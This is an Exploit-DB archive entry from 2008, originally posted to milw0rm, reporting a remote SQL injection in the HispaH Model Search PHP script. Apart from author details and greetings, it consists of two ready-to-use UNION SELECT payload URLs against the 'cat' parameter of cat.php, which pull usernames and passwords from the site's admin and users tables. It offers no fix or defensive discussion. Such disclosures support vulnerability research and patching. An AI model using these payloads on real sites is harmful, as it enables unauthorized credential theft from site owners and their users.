HispaH Model Search - 'cat.php?cat' SQL Injection

EDB-ID:

5577


Platform:

PHP

Published:

2008-05-09

############### >>> Remote SQL Injection <<<  ###############
##    Cyb3r-1st                                                              Cyb3r-1st    ##
################## >>> InjEctOr5 TeaM  <<< ################

## author   :  cyb3r-1st
## contact :  t3tto0 [at] yahoo.com
                 cyb3r-1st [at] hotmail.com

## script : model-search
## download : www.hispah.com/demos/models1rock  ::> demo

## dork    : find it
## exploit : http://www.site.me/cat.php?cat=[sql injection]

## example:here u can found an sql exploit :::
## for admin inf0 :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
## for users inf0  :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*


########### Greetz #############

>>> InjEctOr5 TeaM
>>>my best freinds ::  titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy -x  and all freinds
>>> all muslims

# milw0rm.com [2008-05-09]